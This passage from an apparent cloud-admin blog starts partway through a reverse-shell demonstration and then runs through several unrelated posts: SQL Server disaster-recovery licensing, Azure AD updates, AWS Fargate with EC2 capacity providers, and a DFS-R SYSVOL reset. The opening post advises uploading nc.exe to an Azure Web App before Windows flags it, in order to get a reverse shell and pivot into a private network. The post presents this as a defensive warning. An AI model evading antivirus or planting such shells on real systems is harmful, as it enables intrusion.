Please be aware that Windows 10 flags nc.exe as unwanted software, so right after unzipping you have only a few seconds to upload it to the Web App.

What is it for?

The main reason for this blog post is that a Web App can be used as an entry point to your infrastructure and should be protected. Similar code can be run from your Web App via the web and establish a reverse shell. This is especially dangerous when your Web App is connected to your private virtual network – in this way, a hacker can get from your Web App into your virtual machine environment.

Cloud is always a shared responsibility model – you are responsible for securing your environments, scanning for unwanted files, and filtering egress and ingress traffic, which is possible in an App Service Environment or via Application Gateway.

SQL Server Software Assurance Licensing Benefits for Disaster Recovery

If a customer is on-premises, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on-premises;
  • One free passive core for DR (async replication only);
  • One free passive core for DR on SQL Server on Azure VM (async replication only).

 

If a customer is on Azure VM, then they get the following with Software Assurance for every core that is deployed on the primary:

  • One free passive core for HA or DR on Azure VM;
  • One free passive core for DR on Azure VM (async replication only).

 

Passive SQL Server instance – the following operations are allowed on a passive secondary:

  • Database consistency maintenance operations;
  • Log Backups;
  • Full Backups;
  • Monitoring applications can connect and gather data.

News from the last quarter of 2019 in the field of Azure Active Directory

Successor of Azure AD Connect: Azure AD Connect cloud provisioning

https://docs.microsoft.com/en-us/azure/active-directory/cloud-provisioning/what-is-cloud-provisioning

Azure AD authentication to Windows VMs

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-authentication-to-windows-vms-in-azure-now-in-public/ba-p/827840

Conditional Access report-only mode

Evaluate impacts of new policies before rolling them out across the entire organization.

Monitor impact with Azure Monitor and the new Conditional Access Insights workbook.

News in Identity Protection

  • Added and enhanced signals
  • New detections
  • Improved APIs
  • New user interface
  • Azure Sentinel integration

https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection

Security Defaults

Preconfigured security settings for common attacks

Basic level of security at no extra cost

https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults

New built-in roles in Azure AD

  • Global reader
  • Authentication admin
  • Privileged authentication admin
  • Azure DevOps admin
  • Security operator
  • Several B2C roles
  • Group admin
  • Office apps admin
  • Compliance data admin
  • External identity provider admin
  • Kaizala admin
  • Message center privacy reader
  • Password admin
  • Search admin
  • Search editor

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/16-new-built-in-roles-including-global-reader-now-available-in/ba-p/900749

https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#available-roles

Azure AD entitlement management

  • Govern employee and partner access at enterprise scale
  • Automate employee and partner access requests, approvals, auditing and review

https://docs.microsoft.com/en-us/azure/active-directory/governance/entitlement-management-overview

Admin consent workflow

Admin consent workflow – gives end users a way to request access to applications that require admin consent.

Without an admin consent workflow, a user in a tenant where user consent is disabled will be blocked when they try to access any app that requires permissions to access organizational data.

  • Users can request access when user consent is disabled
  • Users can request access when apps request permissions that require admin consent
  • Gives admins a secure way to receive and process access requests
  • Users are notified of admin action

https://aka.ms/adminconsentworkflow/

Secure legacy apps with app delivery controllers and networks

  • Simplify secure access to on-premises legacy-auth based apps
  • Access apps that use Kerberos, header-based auth, form-based auth, LDAP, NTLM, RDP, SSH
  • F5, Citrix, Akamai, ZScaler
  • Allow use of Conditional Access and passwordless auth with on-prem apps

https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/secure-hybrid-access

Migrate to cloud authentication by using staged rollout

Configure groups of users to use cloud authentication instead of federation

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-staged-rollout

Passwordless security key sign in to on-premises resources

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/replace-passwords-with-a-biometric-security-key/ba-p/827844

Forest trust to an on-premises domain in Azure Active Directory Domain Services

https://docs.microsoft.com/en-us/azure/active-directory-domain-services/tutorial-create-forest-trust

Microsoft identity platform authentication libraries updates

https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-v2-libraries

Direct federation with AD FS and third-party providers for guest users

https://docs.microsoft.com/pl-pl/azure/active-directory/b2b/direct-federation

Tutorials for integrating SaaS applications with Azure Active Directory

https://docs.microsoft.com/azure/active-directory/saas-apps/tutorial-list

 

AWS Fargate Cluster coexistence with EC2 instances / Autoscaling Capacity Providers

It is possible to add capacity providers with autoscaling EC2 instances to your AWS Fargate cluster. You can use this to debug some containers – you can just log in to the EC2 instance where your container is running – or to optimize the use of EC2 / Fargate instances, especially when you use reserved EC2 instances.

When you directly add autoscaling EC2 instances as capacity providers, you can receive these kinds of errors:

unable to place a task because no container instance met all of its requirements

or

No Container Instances were found in your cluster

The trick is: when you create the Launch Configuration, select a Community AMI, e.g. amzn2-ami-ecs-hvm-2.0.20191212-x86_64-ebs – of course, choose the latest one.

Also choose the IAM role ecsInstanceRole and, most importantly, provide this in the user data:

#!/bin/bash
echo ECS_CLUSTER=LastFinal >> /etc/ecs/ecs.config
sudo iptables --insert FORWARD 1 --in-interface docker+ --destination 169.254.169.254/32 --jump DROP
sudo service iptables save
echo ECS_AWSVPC_BLOCK_IMDS=true >> /etc/ecs/ecs.config

After you create the Auto Scaling group, your instances should come to life and you should see them in your Fargate cluster:

Now you can add the capacity provider; Managed termination protection should be disabled.

And now you can run your tasks with the Fargate or the EC2 launch type. Please remember that the task definition must be compatible with EC2.

Launch command line:

aws ecs create-service --capacity-provider-strategy capacityProvider=EC2CapacityProvider,weight=1 --cluster LastFinal --service-name shellexample --task-definition shell:2 --desired-count 1 --network-configuration "awsvpcConfiguration={subnets=[subnet-068457290b918bf38],securityGroups=[sg-0563e9b190a2ccf65]}"

This member is waiting for initial replication for replicated folder SYSVOL Share and is not currently participating in replication.

This is similar to the FRS (File Replication Service) reinitialization problem described, for example, here: https://support.microsoft.com/en-us/help/290762/using-the-burflags-registry-key-to-reinitialize-file-replication-servi

 

But we need to do it for DFS-R. Quick steps:

 

  1. On the source domain controller, stop the DFS Replication service.
  2. Open ADSI Edit and set msDFSR-Enabled to False, here:


     

  3. Set msDFSR-Options to 1


  4. Do:

    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

     

  5. On all remaining domain controllers, open ADSI Edit and set msDFSR-Enabled to False, here:


  6. repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  7. Start DFS Replication Service
  8. Open ADSI Edit and set msDFSR-Enabled to True on the primary domain controller.
  9. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  10. On every domain controller, open ADSI Edit and set msDFSR-Enabled to True.
  11. Issue DFSRDIAG POLLAD
    repadmin /syncall source-dc /APed

    repadmin /syncall /Aed

  12. Now replication of SYSVOL should work again.
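
As a quick check, watch the DFS Replication event log: Event ID 4602 on the authoritative domain controller, and 4614 followed by 4604 on the remaining ones, indicate that SYSVOL has finished its initial sync.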